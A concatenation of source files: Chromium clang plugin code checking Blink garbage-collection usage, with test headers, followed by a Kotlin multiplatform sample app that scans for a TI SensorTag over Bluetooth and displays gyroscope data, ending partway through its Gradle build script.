void RecursiveEdgeVisitor::AtCollection(Collection*) {}
void RecursiveEdgeVisitor::AtIterator(Iterator*) {}
void RecursiveEdgeVisitor::VisitValue(Value* e) {
AtValue(e);
}
void RecursiveEdgeVisitor::VisitRawPtr(RawPtr* e) {
AtRawPtr(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitRefPtr(RefPtr* e) {
AtRefPtr(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitUniquePtr(UniquePtr* e) {
AtUniquePtr(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitMember(Member* e) {
AtMember(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitWeakMember(WeakMember* e) {
AtWeakMember(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitPersistent(Persistent* e) {
AtPersistent(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitCrossThreadPersistent(
CrossThreadPersistent* e) {
AtCrossThreadPersistent(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitCollection(Collection* e) {
AtCollection(e);
Enter(e);
e->AcceptMembers(this);
Leave();
}
void RecursiveEdgeVisitor::VisitIterator(Iterator* e) {
AtIterator(e);
}
<|start_filename|>tools/clang/plugins/Options.h<|end_filename|>
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TOOLS_CLANG_PLUGINS_OPTIONS_H_
#define TOOLS_CLANG_PLUGINS_OPTIONS_H_
namespace chrome_checker {
struct Options {
bool check_base_classes = false;
bool check_ipc = false;
bool check_gmock_objects = false;
};
} // namespace chrome_checker
#endif // TOOLS_CLANG_PLUGINS_OPTIONS_H_
<|start_filename|>tools/clang/blink_gc_plugin/CheckFieldsVisitor.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TOOLS_BLINK_GC_PLUGIN_CHECK_FIELDS_VISITOR_H_
#define TOOLS_BLINK_GC_PLUGIN_CHECK_FIELDS_VISITOR_H_
#include <vector>
#include "BlinkGCPluginOptions.h"
#include "Edge.h"
class FieldPoint;
// This visitor checks that the fields of a class are "well formed".
// - unique_ptr and RefPtr must not point to a GC derived type.
// - Part objects must not be a GC derived type.
// - An on-heap class must never contain GC roots.
// - Only stack-allocated types may point to stack-allocated types.
class CheckFieldsVisitor : public RecursiveEdgeVisitor {
public:
enum Error {
kRawPtrToGCManaged,
kRefPtrToGCManaged,
kReferencePtrToGCManaged,
kUniquePtrToGCManaged,
kMemberToGCUnmanaged,
kMemberInUnmanaged,
kPtrFromHeapToStack,
kGCDerivedPartObject,
kIteratorToGCManaged,
};
using Errors = std::vector<std::pair<FieldPoint*, Error>>;
explicit CheckFieldsVisitor(const BlinkGCPluginOptions&);
Errors& invalid_fields();
bool ContainsInvalidFields(RecordInfo* info);
void AtMember(Member*) override;
void AtWeakMember(WeakMember*) override;
void AtValue(Value*) override;
void AtCollection(Collection*) override;
void AtIterator(Iterator*) override;
private:
Error InvalidSmartPtr(Edge* ptr);
const BlinkGCPluginOptions& options_;
FieldPoint* current_;
bool stack_allocated_host_;
bool managed_host_;
Errors invalid_fields_;
};
#endif // TOOLS_BLINK_GC_PLUGIN_CHECK_FIELDS_VISITOR_H_
<|start_filename|>tools/clang/blink_gc_plugin/BadPatternFinder.cpp<|end_filename|>
// Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "BadPatternFinder.h"
#include "DiagnosticsReporter.h"
#include "clang/AST/ASTContext.h"
#include "clang/ASTMatchers/ASTMatchFinder.h"
#include "clang/ASTMatchers/ASTMatchers.h"
using namespace clang::ast_matchers;
namespace {
TypeMatcher GarbageCollectedType() {
auto has_gc_base = hasCanonicalType(hasDeclaration(
cxxRecordDecl(isDerivedFrom(hasAnyName("::blink::GarbageCollected",
"::blink::GarbageCollectedMixin")))
.bind("gctype")));
return anyOf(has_gc_base,
hasCanonicalType(arrayType(hasElementType(has_gc_base))));
}
class UniquePtrGarbageCollectedMatcher : public MatchFinder::MatchCallback {
public:
explicit UniquePtrGarbageCollectedMatcher(DiagnosticsReporter& diagnostics)
: diagnostics_(diagnostics) {}
void Register(MatchFinder& match_finder) {
// Matches any application of make_unique where the template argument is
// known to refer to a garbage-collected type.
auto make_unique_matcher =
callExpr(
callee(functionDecl(
hasAnyName("::std::make_unique", "::base::WrapUnique"),
hasTemplateArgument(
0, refersToType(GarbageCollectedType())))
.bind("badfunc")))
.bind("bad");
match_finder.addDynamicMatcher(make_unique_matcher, this);
}
void run(const MatchFinder::MatchResult& result) {
auto* bad_use = result.Nodes.getNodeAs<clang::Expr>("bad");
auto* bad_function = result.Nodes.getNodeAs<clang::FunctionDecl>("badfunc");
auto* gc_type = result.Nodes.getNodeAs<clang::CXXRecordDecl>("gctype");
diagnostics_.UniquePtrUsedWithGC(bad_use, bad_function, gc_type);
}
private:
DiagnosticsReporter& diagnostics_;
};
class OptionalGarbageCollectedMatcher : public MatchFinder::MatchCallback {
public:
explicit OptionalGarbageCollectedMatcher(DiagnosticsReporter& diagnostics)
: diagnostics_(diagnostics) {}
void Register(MatchFinder& match_finder) {
// Matches any construction of a base::Optional where the template argument is
// known to refer to a garbage-collected type.
auto optional_construction =
cxxConstructExpr(hasDeclaration(cxxConstructorDecl(ofClass(
classTemplateSpecializationDecl(
hasName("::base::Optional"),
hasTemplateArgument(
0, refersToType(GarbageCollectedType())))
.bind("optional")))))
.bind("bad");
match_finder.addDynamicMatcher(optional_construction, this);
}
void run(const MatchFinder::MatchResult& result) {
auto* bad_use = result.Nodes.getNodeAs<clang::Expr>("bad");
auto* optional = result.Nodes.getNodeAs<clang::CXXRecordDecl>("optional");
auto* gc_type = result.Nodes.getNodeAs<clang::CXXRecordDecl>("gctype");
diagnostics_.OptionalUsedWithGC(bad_use, optional, gc_type);
}
private:
DiagnosticsReporter& diagnostics_;
};
} // namespace
void FindBadPatterns(clang::ASTContext& ast_context,
DiagnosticsReporter& diagnostics) {
MatchFinder match_finder;
UniquePtrGarbageCollectedMatcher unique_ptr_gc(diagnostics);
unique_ptr_gc.Register(match_finder);
OptionalGarbageCollectedMatcher optional_gc(diagnostics);
optional_gc.Register(match_finder);
match_finder.matchAST(ast_context);
}
<|start_filename|>tools/clang/blink_gc_plugin/tests/traceimpl_omitted_trace.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TRACEIMPL_OMITTED_TRACE_H_
#define TRACEIMPL_OMITTED_TRACE_H_
#include "heap/stubs.h"
namespace blink {
class A : public GarbageCollected<A> {
public:
virtual void Trace(Visitor* visitor) {}
};
class B : public A {
// Trace() isn't necessary because we've got nothing to trace here.
};
class C : public B {
public:
void Trace(Visitor* visitor) override {
// B::Trace() is actually A::Trace(), and in certain cases we only get
// limited information like "there is a function call that will be resolved
// to A::Trace()". We still want to mark B as Traced.
B::Trace(visitor);
}
};
}
#endif // TRACEIMPL_OMITTED_TRACE_H_
<|start_filename|>tools/clang/traffic_annotation_extractor/tests/dummy_classes.h<|end_filename|>
// Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include <memory>
#include "net/traffic_annotation/network_traffic_annotation.h"
// This file provides all required dummy classes for:
// tools/clang/traffic_annotation_extractor/tests/test-original.cc
class GURL {};
namespace net {
class URLRequest {
public:
class Delegate;
};
class URLFetcherDelegate;
enum RequestPriority { TEST_VALUE };
class URLFetcher {
public:
enum RequestType { TEST_VALUE };
static std::unique_ptr<URLFetcher> Create(
const GURL& url,
URLFetcher::RequestType request_type,
URLFetcherDelegate* d);
static std::unique_ptr<URLFetcher> Create(
int id,
const GURL& url,
URLFetcher::RequestType request_type,
URLFetcherDelegate* d);
static std::unique_ptr<URLFetcher> Create(
const GURL& url,
URLFetcher::RequestType request_type,
URLFetcherDelegate* d,
NetworkTrafficAnnotationTag traffic_annotation);
static std::unique_ptr<URLFetcher> Create(
int id,
const GURL& url,
URLFetcher::RequestType request_type,
URLFetcherDelegate* d,
NetworkTrafficAnnotationTag traffic_annotation);
};
class URLRequestContext {
public:
std::unique_ptr<URLRequest> CreateRequest(
const GURL& url,
RequestPriority priority,
URLRequest::Delegate* delegate) const;
std::unique_ptr<URLRequest> CreateRequest(
const GURL& url,
RequestPriority priority,
URLRequest::Delegate* delegate,
NetworkTrafficAnnotationTag traffic_annotation) const;
};
} // namespace net
<|start_filename|>tools/clang/blink_gc_plugin/tests/trace_after_dispatch_impl.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TRACE_AFTER_DISPATCH_IMPL_H_
#define TRACE_AFTER_DISPATCH_IMPL_H_
#include "heap/stubs.h"
namespace blink {
class X : public GarbageCollected<X> {
public:
void Trace(Visitor*) {}
};
enum ClassTag {
BASE, DERIVED
};
class TraceAfterDispatchInlinedBase
: public GarbageCollected<TraceAfterDispatchInlinedBase> {
public:
explicit TraceAfterDispatchInlinedBase(ClassTag tag) : tag_(tag) {}
void Trace(Visitor*);
void TraceAfterDispatch(Visitor* visitor) { visitor->Trace(x_base_); }
private:
ClassTag tag_;
Member<X> x_base_;
};
class TraceAfterDispatchInlinedDerived : public TraceAfterDispatchInlinedBase {
public:
TraceAfterDispatchInlinedDerived() : TraceAfterDispatchInlinedBase(DERIVED) {}
void TraceAfterDispatch(Visitor* visitor) {
visitor->Trace(x_derived_);
TraceAfterDispatchInlinedBase::TraceAfterDispatch(visitor);
}
private:
Member<X> x_derived_;
};
class TraceAfterDispatchExternBase
: public GarbageCollected<TraceAfterDispatchExternBase> {
public:
explicit TraceAfterDispatchExternBase(ClassTag tag) : tag_(tag) {}
void Trace(Visitor* visitor);
void TraceAfterDispatch(Visitor* visitor);
private:
ClassTag tag_;
Member<X> x_base_;
};
class TraceAfterDispatchExternDerived : public TraceAfterDispatchExternBase {
public:
TraceAfterDispatchExternDerived() : TraceAfterDispatchExternBase(DERIVED) {}
void TraceAfterDispatch(Visitor* visitor);
private:
Member<X> x_derived_;
};
}
#endif // TRACE_AFTER_DISPATCH_IMPL_H_
<|start_filename|>tools/clang/blink_gc_plugin/tests/traceimpl_derived_from_templated_base.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TRACEIMPL_DERIVED_FROM_TEMPLATED_BASE_H_
#define TRACEIMPL_DERIVED_FROM_TEMPLATED_BASE_H_
#include "heap/stubs.h"
namespace blink {
class X : public GarbageCollected<X> {
public:
virtual void Trace(Visitor*) {}
};
template <int Y>
class TraceImplTemplatedBase
: public GarbageCollected<TraceImplTemplatedBase<Y> > {
public:
void Trace(Visitor* visitor) { visitor->Trace(x_); }
private:
Member<X> x_;
};
class TraceImplDerivedFromTemplatedBase : public TraceImplTemplatedBase<0> {
};
}
#endif // TRACEIMPL_DERIVED_FROM_TEMPLATED_BASE_H_
| mtk-watch/android_external_v8 |
<|start_filename|>app/src/macosx64Main/kotlin/main.kt<|end_filename|>
package com.juul.sensortag
import com.juul.kable.Scanner
import com.juul.kable.State.Disconnected
import com.juul.kable.logs.Logging.Level.Data
import com.juul.kable.peripheral
import com.juul.tuulbox.logging.ConsoleLogger
import com.juul.tuulbox.logging.Log
import kotlinx.coroutines.delay
import kotlinx.coroutines.flow.first
import kotlinx.coroutines.flow.launchIn
import kotlinx.coroutines.flow.onEach
import kotlinx.coroutines.runBlocking
fun main() = runBlocking<Unit> {
Log.dispatcher.install(ConsoleLogger)
Log.info { "Searching for SensorTag..." }
val advertisement = Scanner()
.advertisements
.first { it.name?.isSensorTag == true }
Log.info { "Found $advertisement" }
val peripheral = peripheral(advertisement) {
logging {
level = Data
}
}
val sensorTag = SensorTag(peripheral)
sensorTag.gyro.onEach { rotation ->
Log.info { rotation.toString() }
}.launchIn(this)
suspend fun connect() {
Log.info { "Connecting..." }
peripheral.connect()
Log.info { "Connected" }
Log.verbose { "Writing gyro period" }
sensorTag.writeGyroPeriod(periodMillis = 2550L)
Log.info { "Enabling gyro" }
sensorTag.enableGyro()
Log.info { "Gyro enabled" }
}
Log.info { "Configuring auto connector" }
peripheral.state.onEach { state ->
Log.info { state.toString() }
if (state is Disconnected) {
connect()
delay(5_000L) // Throttle reconnects so we don't hammer the system if connection immediately drops.
}
}.launchIn(this)
}
private val String.isSensorTag: Boolean
get() = startsWith("SensorTag") || startsWith("CC2650 SensorTag")
<|start_filename|>app/src/androidMain/kotlin/features/scan/DiffCallback.kt<|end_filename|>
package com.juul.sensortag.features.scan
import androidx.recyclerview.widget.DiffUtil
import com.juul.kable.Advertisement
class DiffCallback(
private val oldAdvertisements: List<Advertisement>,
private val newAdvertisements: List<Advertisement>
) : DiffUtil.Callback() {
override fun getOldListSize(): Int = oldAdvertisements.size
override fun getNewListSize(): Int = newAdvertisements.size
override fun areItemsTheSame(
oldItemPosition: Int,
newItemPosition: Int
): Boolean = oldAdvertisements[oldItemPosition].address == newAdvertisements[newItemPosition].address
override fun areContentsTheSame(
oldItemPosition: Int,
newItemPosition: Int
): Boolean = oldAdvertisements[oldItemPosition].rssi == newAdvertisements[newItemPosition].rssi
}
<|start_filename|>app/src/androidMain/kotlin/LifecycleOwner.kt<|end_filename|>
package com.juul.sensortag
import androidx.lifecycle.LifecycleOwner
import androidx.lifecycle.LiveData
fun <T> LifecycleOwner.observe(
liveData: LiveData<T>,
observer: (value: T) -> Unit
) {
liveData.observe(this) {
observer.invoke(it)
}
}
<|start_filename|>app/src/commonMain/kotlin/SensorTag.kt<|end_filename|>
package com.juul.sensortag
import com.juul.kable.Peripheral
import com.juul.kable.characteristicOf
import com.juul.tuulbox.encoding.toHexString
import com.juul.tuulbox.logging.Log
import kotlinx.coroutines.flow.Flow
import kotlinx.coroutines.flow.drop
import kotlinx.coroutines.flow.map
private const val MOVEMENT_SENSOR_SERVICE_UUID = "F000AA80-0451-4000-B000-000000000000"
private val movementConfigCharacteristic = characteristicOf(
service = MOVEMENT_SENSOR_SERVICE_UUID,
characteristic = "F000AA82-0451-4000-B000-000000000000",
)
private val movementDataCharacteristic = characteristicOf(
service = MOVEMENT_SENSOR_SERVICE_UUID,
characteristic = "F000AA81-0451-4000-B000-000000000000",
)
private val movementPeriodCharacteristic = characteristicOf(
service = MOVEMENT_SENSOR_SERVICE_UUID,
characteristic = "F000AA83-0451-4000-B000-000000000000",
)
data class Vector3f(val x: Float, val y: Float, val z: Float)
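// Descriptive note (added): raw movement samples are signed 16-bit values, so 500/65536 maps them
// to roughly ±250 °/s, matching the "˚/sec" labels shown in the UI.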
private const val GYRO_MULTIPLIER = 500f / 65536f
class SensorTag(
private val peripheral: Peripheral
) : Peripheral by peripheral {
val gyro: Flow<Vector3f> = peripheral.observe(movementDataCharacteristic)
.map { data ->
Vector3f(
x = data.x * GYRO_MULTIPLIER,
y = data.y * GYRO_MULTIPLIER,
z = data.z * GYRO_MULTIPLIER,
)
}
/** Set period, allowable range is 100-2550 ms. */
suspend fun writeGyroPeriod(periodMillis: Long) {
val value = periodMillis / 10
val data = byteArrayOf(value.toByte())
Log.info { "movement → writePeriod → data = $value (${data.toHexString()})" }
peripheral.write(movementPeriodCharacteristic, data)
Log.info { "writeGyroPeriod complete" }
}
/** Period (in milliseconds) within the range 100-2550 ms. */
suspend fun readGyroPeriod(): Int {
val value = peripheral.read(movementPeriodCharacteristic)
Log.info { "movement → readPeriod → value = ${value.toHexString()}" }
return (value[0] and 0xff) * 10 // Mask the signed byte so periods above 1270 ms don't read back negative.
}
suspend fun enableGyro() {
Log.info { "Enabling gyro" }
peripheral.write(movementConfigCharacteristic, byteArrayOf(0x7F, 0x0))
Log.info { "Gyro enabled" }
}
suspend fun disableGyro() {
peripheral.write(movementConfigCharacteristic, byteArrayOf(0x0, 0x0))
}
}
private inline val ByteArray.x: Short get() = readShort(0)
private inline val ByteArray.y: Short get() = readShort(2)
private inline val ByteArray.z: Short get() = readShort(4)
private inline infix fun Byte.and(other: Int): Int = toInt() and other
private inline fun ByteArray.readShort(offset: Int): Short {
val value = get(offset) and 0xff or (get(offset + 1) and 0xff shl 8)
return value.toShort()
}
<|start_filename|>app/src/androidMain/kotlin/features/sensor/SensorViewModel.kt<|end_filename|>
package com.juul.sensortag.features.sensor
import android.app.Application
import android.bluetooth.BluetoothAdapter
import androidx.lifecycle.AndroidViewModel
import androidx.lifecycle.viewModelScope
import com.juul.kable.ConnectionLostException
import com.juul.kable.NotReadyException
import com.juul.kable.Peripheral
import com.juul.kable.State
import com.juul.kable.peripheral
import com.juul.sensortag.SensorTag
import com.juul.sensortag.Vector3f
import com.juul.sensortag.features.sensor.ViewState.Connected.GyroState
import com.juul.sensortag.features.sensor.ViewState.Connected.GyroState.AxisState
import com.juul.tuulbox.logging.Log
import kotlinx.coroutines.CoroutineScope
import kotlinx.coroutines.GlobalScope
import kotlinx.coroutines.delay
import kotlinx.coroutines.flow.Flow
import kotlinx.coroutines.flow.catch
import kotlinx.coroutines.flow.combine
import kotlinx.coroutines.flow.filter
import kotlinx.coroutines.flow.flatMapLatest
import kotlinx.coroutines.flow.flow
import kotlinx.coroutines.flow.flowOf
import kotlinx.coroutines.flow.launchIn
import kotlinx.coroutines.flow.onEach
import kotlinx.coroutines.launch
import kotlinx.coroutines.withTimeoutOrNull
import java.util.concurrent.TimeUnit
import java.util.concurrent.atomic.AtomicInteger
import kotlin.math.absoluteValue
import kotlin.math.pow
import kotlin.math.roundToInt
private val DISCONNECT_TIMEOUT = TimeUnit.SECONDS.toMillis(5)
sealed class ViewState {
object Connecting : ViewState()
data class Connected(
val rssi: Int,
val gyro: GyroState
) : ViewState() {
data class GyroState(
val x: AxisState,
val y: AxisState,
val z: AxisState
) {
data class AxisState(
val label: CharSequence,
val progress: Int
)
}
}
object Disconnecting : ViewState()
object Disconnected : ViewState()
}
val ViewState.label: CharSequence
get() = when (this) {
ViewState.Connecting -> "Connecting"
is ViewState.Connected -> "Connected"
ViewState.Disconnecting -> "Disconnecting"
ViewState.Disconnected -> "Disconnected"
}
class SensorViewModel(
application: Application,
macAddress: String
) : AndroidViewModel(application) {
private val peripheral = viewModelScope.peripheral(bluetoothDeviceFrom(macAddress))
private val sensorTag = SensorTag(peripheral)
private val connectionAttempt = AtomicInteger()
private val periodProgress = AtomicInteger()
init {
viewModelScope.enableAutoReconnect()
viewModelScope.connect()
}
private fun CoroutineScope.enableAutoReconnect() {
peripheral.state
.filter { it is State.Disconnected }
.onEach {
val timeMillis =
backoff(base = 500L, multiplier = 2f, retry = connectionAttempt.getAndIncrement())
Log.info { "Waiting $timeMillis ms to reconnect..." }
delay(timeMillis)
connect()
}
.launchIn(this)
}
private fun CoroutineScope.connect() {
connectionAttempt.incrementAndGet()
launch {
Log.debug { "connect" }
try {
peripheral.connect()
sensorTag.enableGyro()
sensorTag.writeGyroPeriodProgress(periodProgress.get())
connectionAttempt.set(0)
} catch (e: ConnectionLostException) {
Log.warn(e) { "Connection attempt failed" }
}
}
}
val viewState: Flow<ViewState> = peripheral.state.flatMapLatest { state ->
when (state) {
is State.Connecting -> flowOf(ViewState.Connecting)
State.Connected -> combine(peripheral.remoteRssi(), sensorTag.gyro) { rssi, gyro ->
ViewState.Connected(rssi, gyroState(gyro))
}
State.Disconnecting -> flowOf(ViewState.Disconnecting)
is State.Disconnected -> flowOf(ViewState.Disconnected)
}
}
private val max = Max()
private fun gyroState(gyro: Vector3f): GyroState {
val (progressX, progressY, progressZ) = gyro.progress(max.maxOf(gyro))
return GyroState(
x = AxisState(label = "X: ${gyro.x} ˚/sec", progress = progressX),
y = AxisState(label = "Y: ${gyro.y} ˚/sec", progress = progressY),
z = AxisState(label = "Z: ${gyro.z} ˚/sec", progress = progressZ)
)
}
fun setPeriod(progress: Int) {
periodProgress.set(progress)
viewModelScope.launch {
sensorTag.writeGyroPeriodProgress(progress)
}
}
override fun onCleared() {
GlobalScope.launch {
withTimeoutOrNull(DISCONNECT_TIMEOUT) {
peripheral.disconnect()
}
}
}
}
private fun bluetoothDeviceFrom(macAddress: String) =
BluetoothAdapter.getDefaultAdapter().getRemoteDevice(macAddress)
private fun Peripheral.remoteRssi() = flow {
while (true) {
val rssi = rssi()
Log.debug { "RSSI: $rssi" }
emit(rssi)
delay(1_000L)
}
}.catch { cause ->
// todo: Investigate better way of handling this failure case.
// When disconnecting, we may attempt to read `rssi` causing a `NotReadyException` but the hope is that `remoteRssi`
// Flow would already be cancelled by the time the `Peripheral` is "not ready" (doesn't seem to be the case).
if (cause !is NotReadyException) throw cause
}
private suspend fun SensorTag.writeGyroPeriodProgress(progress: Int) {
val period = progress / 100f * (2550 - 100) + 100
Log.verbose { "period = $period" }
writeGyroPeriod(period.toLong())
}
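// Worked example of the mapping above (illustrative): progress 0 → 100 ms, 50 → 1325 ms, 100 → 2550 ms.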
private fun Vector3f.progress(max: Max) = Triple(
((if (max.x != 0f) x.absoluteValue / max.x else 0f) * 100).roundToInt(),
((if (max.y != 0f) y.absoluteValue / max.y else 0f) * 100).roundToInt(),
((if (max.z != 0f) z.absoluteValue / max.z else 0f) * 100).roundToInt()
)
private data class Max(
var x: Float = 0f,
var y: Float = 0f,
var z: Float = 0f
) {
fun maxOf(vector: Vector3f) = apply {
x = maxOf(x, vector.x.absoluteValue)
y = maxOf(y, vector.y.absoluteValue)
z = maxOf(z, vector.z.absoluteValue)
}
}
/**
* Exponential backoff using the following formula:
*
* ```
* delay = base * multiplier ^ (retry - 1)
* ```
*
* For example (using `base = 100` and `multiplier = 2`):
*
* | retry | delay |
* |-------|-------|
* | 1 | 100 |
* | 2 | 200 |
* | 3 | 400 |
* | 4 | 800 |
* | 5 | 1600 |
* | ... | ... |
*
* Inspired by:
* [Exponential Backoff And Jitter](https://aws.amazon.com/blogs/architecture/exponential-backoff-and-jitter/)
*
* @return Backoff delay (in units matching [base] units, e.g. if [base] units are milliseconds then returned delay will be milliseconds).
*/
private fun backoff(
base: Long,
multiplier: Float,
retry: Int,
): Long = (base * multiplier.pow(retry - 1)).toLong()
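// Sketch (added for illustration, not part of the original file): the delays backoff() yields with
// the base and multiplier used by enableAutoReconnect() above.
@Suppress("unused")
private fun exampleReconnectDelays(): List<Long> =
(1..5).map { retry -> backoff(base = 500L, multiplier = 2f, retry = retry) }
// -> [500, 1000, 2000, 4000, 8000] milliseconds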
<|start_filename|>app/src/androidMain/kotlin/features/scan/ScanActivity.kt<|end_filename|>
package com.juul.sensortag.features.scan
import android.Manifest.permission.ACCESS_COARSE_LOCATION
import android.Manifest.permission.ACCESS_FINE_LOCATION
import android.app.Activity
import android.bluetooth.BluetoothAdapter
import android.bluetooth.BluetoothAdapter.ACTION_REQUEST_ENABLE
import android.content.Context
import android.content.Intent
import android.content.pm.PackageManager.PERMISSION_GRANTED
import android.os.Build
import android.os.Bundle
import android.view.Menu
import android.view.MenuItem
import android.view.View
import androidx.activity.viewModels
import androidx.appcompat.app.AlertDialog
import androidx.appcompat.app.AppCompatActivity
import androidx.core.app.ActivityCompat
import androidx.core.content.ContextCompat
import androidx.lifecycle.asLiveData
import androidx.recyclerview.widget.LinearLayoutManager
import com.google.android.material.snackbar.Snackbar
import com.juul.kable.Advertisement
import com.juul.sensortag.R
import com.juul.sensortag.databinding.ScanBinding
import com.juul.sensortag.features.scan.ScanStatus.Failed
import com.juul.sensortag.features.scan.ScanStatus.Started
import com.juul.sensortag.features.scan.ScanStatus.Stopped
import com.juul.sensortag.features.sensor.SensorActivityIntent
import com.juul.sensortag.observe
import com.juul.tuulbox.logging.Log
class ScanActivity : AppCompatActivity() {
private val viewModel by viewModels<ScanViewModel>()
private lateinit var adapter: ScanAdapter
private var snackbar: Snackbar? = null
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
val listener = { advertisement: Advertisement ->
viewModel.stopScan()
val intent = SensorActivityIntent(
context = this@ScanActivity,
macAddress = advertisement.address
)
startActivity(intent)
}
adapter = ScanAdapter(listener).apply {
setHasStableIds(true)
}
observe(viewModel.advertisements.asLiveData()) {
adapter.update(it)
}
observe(viewModel.scanStatus.asLiveData()) { status ->
Log.debug { "Scan status: $status" }
when (status) {
Started -> showSnackbar("Scanning")
Stopped -> dismissSnackbar()
is Failed -> {
dismissSnackbar()
showAlert("Scan failed!\n${status.message}")
}
}
}
ScanBinding.inflate(layoutInflater).apply {
scanList.layoutManager = LinearLayoutManager(this@ScanActivity)
scanList.adapter = adapter
setContentView(root)
}
}
override fun onCreateOptionsMenu(menu: Menu): Boolean {
menuInflater.inflate(R.menu.scan, menu)
return true
}
override fun onOptionsItemSelected(
item: MenuItem,
): Boolean {
when (item.itemId) {
R.id.refresh -> scan()
R.id.clear -> {
viewModel.stopScan()
adapter.update(emptyList())
}
else -> return super.onOptionsItemSelected(item)
}
return true
}
private fun scan() {
when {
!isBluetoothEnabled -> enableBluetooth()
!hasLocationPermission -> requestLocationPermission()
else -> viewModel.startScan()
}
}
private data class SnackbarAction(
val text: CharSequence,
val action: View.OnClickListener,
)
private fun showSnackbar(
text: CharSequence,
action: SnackbarAction? = null,
) {
snackbar = Snackbar
.make(findViewById(R.id.scan_list), text, Snackbar.LENGTH_INDEFINITE)
.apply {
if (action != null) setAction(action.text, action.action)
show()
}
}
private fun dismissSnackbar() {
snackbar?.dismiss()
snackbar = null
}
override fun onPause() {
super.onPause()
viewModel.stopScan()
}
}
private fun Context.showAlert(message: CharSequence) {
AlertDialog.Builder(this)
.setMessage(message)
.show()
}
private val isBluetoothEnabled: Boolean
get() = BluetoothAdapter.getDefaultAdapter().isEnabled
private fun Activity.enableBluetooth() {
val intent = Intent(ACTION_REQUEST_ENABLE)
startActivityForResult(intent, RequestCode.EnableBluetooth)
}
private object RequestCode {
const val EnableBluetooth = 55001
const val LocationPermission = 55002
}
private val Context.hasLocationPermission: Boolean
get() = Build.VERSION.SDK_INT < Build.VERSION_CODES.M ||
hasPermission(ACCESS_COARSE_LOCATION) ||
hasPermission(ACCESS_FINE_LOCATION)
private fun Context.hasPermission(
permission: String,
): Boolean = ContextCompat.checkSelfPermission(this, permission) == PERMISSION_GRANTED
/**
* Shows the native Android permission request dialog.
*
* The result of the dialog will come back via [Activity.onRequestPermissionsResult] method.
*/
private fun Activity.requestLocationPermission() {
/* .-----------------------------.
* | _ |
* | /o\ Allow App to access |
* | \ / access this device's |
* | v location? |
* | |
* | [ ] Don't ask again |
* | |
* | DENY ALLOW |
* '-----------------------------'
*
* "Don't ask again" checkbox is not shown on the first request, but on all subsequent requests (after a DENY).
*/
val permissions = arrayOf(ACCESS_FINE_LOCATION)
ActivityCompat.requestPermissions(this, permissions, RequestCode.LocationPermission)
}
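// Sketch (an assumption, not present in the original file): one way ScanActivity could consume the
// permission result promised by the doc comment above, resuming the scan once location is granted.
//
// override fun onRequestPermissionsResult(
//     requestCode: Int,
//     permissions: Array<out String>,
//     grantResults: IntArray,
// ) {
//     super.onRequestPermissionsResult(requestCode, permissions, grantResults)
//     if (requestCode == RequestCode.LocationPermission &&
//         grantResults.firstOrNull() == PERMISSION_GRANTED
//     ) scan()
// }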
<|start_filename|>app/src/androidMain/kotlin/features/sensor/SensorActivity.kt<|end_filename|>
package com.juul.sensortag.features.sensor
import android.os.Bundle
import androidx.activity.viewModels
import androidx.appcompat.app.AppCompatActivity
import androidx.lifecycle.ViewModel
import androidx.lifecycle.ViewModelProvider
import androidx.lifecycle.asLiveData
import com.juul.exercise.annotations.Exercise
import com.juul.exercise.annotations.Extra
import com.juul.sensortag.databinding.SensorBinding
import com.juul.sensortag.features.sensor.ViewState.Connected
import com.juul.sensortag.observe
import com.juul.sensortag.onStopTracking
@Exercise(Extra("macAddress", String::class))
class SensorActivity : AppCompatActivity() {
private val viewModel by viewModels<SensorViewModel> {
object : ViewModelProvider.Factory {
override fun <T : ViewModel> create(
modelClass: Class<T>
): T = SensorViewModel(application, extras.macAddress) as T
}
}
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
SensorBinding.inflate(layoutInflater).apply {
period.onStopTracking { viewModel.setPeriod(progress) }
observe(viewModel.viewState.asLiveData()) { viewState ->
period.isEnabled = viewState is Connected
if (viewState is Connected) {
status.text = "${viewState.label} (${viewState.rssi} dBm)"
with(viewState.gyro) {
xAxisLabel.text = x.label
yAxisLabel.text = y.label
zAxisLabel.text = z.label
xAxisBar.progress = x.progress
yAxisBar.progress = y.progress
zAxisBar.progress = z.progress
}
} else {
status.text = viewState.label
xAxisLabel.text = null
yAxisLabel.text = null
zAxisLabel.text = null
xAxisBar.progress = 0
yAxisBar.progress = 0
zAxisBar.progress = 0
}
}
setContentView(root)
}
}
}
<|start_filename|>app/build.gradle.kts<|end_filename|>
plugins {
id("com.android.application")
kotlin("multiplatform")
id("com.google.devtools.ksp")
}
kotlin {
android()
js().browser()
macosX64 {
binaries {
executable {
baseName = "sensortag"
entryPoint = "com.juul.sensortag.main"
}
}
}
sourceSets {
val commonMain by getting {
dependencies {
api(libs.coroutines.core)
implementation(libs.kable)
implementation(libs.tuulbox.logging)
implementation(libs.tuulbox.encoding)
}
}
val androidMain by getting {
dependencies {
implementation(libs.material)
implementation(libs.bundles.androidx)
implementation(libs.exercise.annotations)
}
}
val nativeMain by creating {
dependencies {
